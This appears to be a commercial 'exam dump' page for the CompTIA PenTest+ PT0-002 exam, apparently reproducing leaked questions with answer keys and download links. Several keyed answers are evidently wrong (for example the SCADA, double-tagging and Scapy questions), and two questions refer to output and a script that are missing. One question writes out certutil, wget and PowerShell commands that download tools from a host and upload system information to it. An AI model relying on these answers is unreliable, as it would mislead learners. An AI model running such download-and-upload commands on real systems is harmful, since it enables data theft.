New PT0-002 dumps contain 162 exam questions and answers and are the best material for preparing for the CompTIA PenTest+ certification exam.
Using PT0-002 dumps: https://www.leads4pass.com/pt0-002.html Select the latest updated PT0-002 dumps PDF, PT0-002 dumps VCE or “PDF + VCE”, Help candidates pass the CompTIA PenTest+ certification exam with ease.
Download Free Share PT0-002 Dumps PDF: https://drive.google.com/file/d/17L47_KDIP0cQJapPpfYFN5yjBJBkT3Wg/
Read the latest free PT0-002 Dumps exam questions and answers online:
Number of exam questions | Exam name | From | Release time | Last updated |
15 | CompTIA PenTest+ Certification Exam | Lead4Pass | Dec 15, 2022 | PT0-002 dumps |
New Question 1:
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.
Correct Answer: C
New Question 2:
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
Correct Answer: C
Reference: https://www.hindawi.com/journals/scn/2018/3794603/
New Question 3:
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C
New Question 4:
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.
Correct Answer: C
New Question 5:
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
Correct Answer: C
New Question 6:
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(`http://192.168.2.124/upload.php\’, `systeminfo.txt\’)
C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe
Correct Answer: B
Reference: https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842
New Question 7:
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
Correct Answer: A
Reference: https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security-protocols
New Question 8:
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
The following request was intercepted going to the network device:
GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
Network management interfaces are available on the production network. An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.
Correct Answer: CE
New Question 9:
A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Correct Answer: A
Reference: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/
New Question 10:
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
A. RFID cloning
B. RFID tagging
C. Meta tagging
D. Tag nesting
Correct Answer: C
New Question 11:
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
A. Look for open ports.
B. Listen for a reverse shell.
C. Attempt to flood open ports.
D. Create an encrypted tunnel.
Correct Answer: A
New Question 12:
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal.
Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site.
Which of the following recommendations would BEST address this situation?
A. Implement a recurring cybersecurity awareness education program for all users.
B. Implement multifactor authentication on all corporate applications.
C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
D. Implement an email security gateway to block spam and malware from email communications.
Correct Answer: A
Reference: https://resources.infosecinstitute.com/topic/top-9-free-phishing-simulators/
New Question 13:
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. Scapy
D. hping3
Correct Answer: A
New Question 14:
A penetration tester is reviewing the following SOW prior to engaging with a client:
“Network diagrams, logical and physical asset inventory, and employees\’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client\’s Chief Information Security
Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”
Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client\’s senior leadership team
D. Seeking help with engagement in underground hacker forums by sharing the client\’s public IP address
E. Using a software-based erase tool to wipe the client\’s findings from the penetration tester\’s laptop
F. Retaining the SOW within the penetration tester\’s company for future use so the sales team can plan future engagements
Correct Answer: CE
New Question 15:
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
A. Aircrack-ng
B. Wireshark
C. Wifite
D. Kismet
Correct Answer: A
Reference: https://purplesec.us/perform-wireless-penetration-test/
…
Lead4Pass PT0-002 dumps have been updated to the latest version. It has been verified by the actual test room and is real and effective. It is the best exam material for the CompTIA PenTest+ certification exam. Download PT0-002 dumps with PDF and VCE: https://www.leads4pass.com/pt0-002.html (162 Q&As)
Help candidates pass 100% of CompTIA PenTest+ certification exams.
BTW, share part of PT0-002 Dumps PDF online download for free:
https://drive.google.com/file/d/17L47_KDIP0cQJapPpfYFN5yjBJBkT3Wg/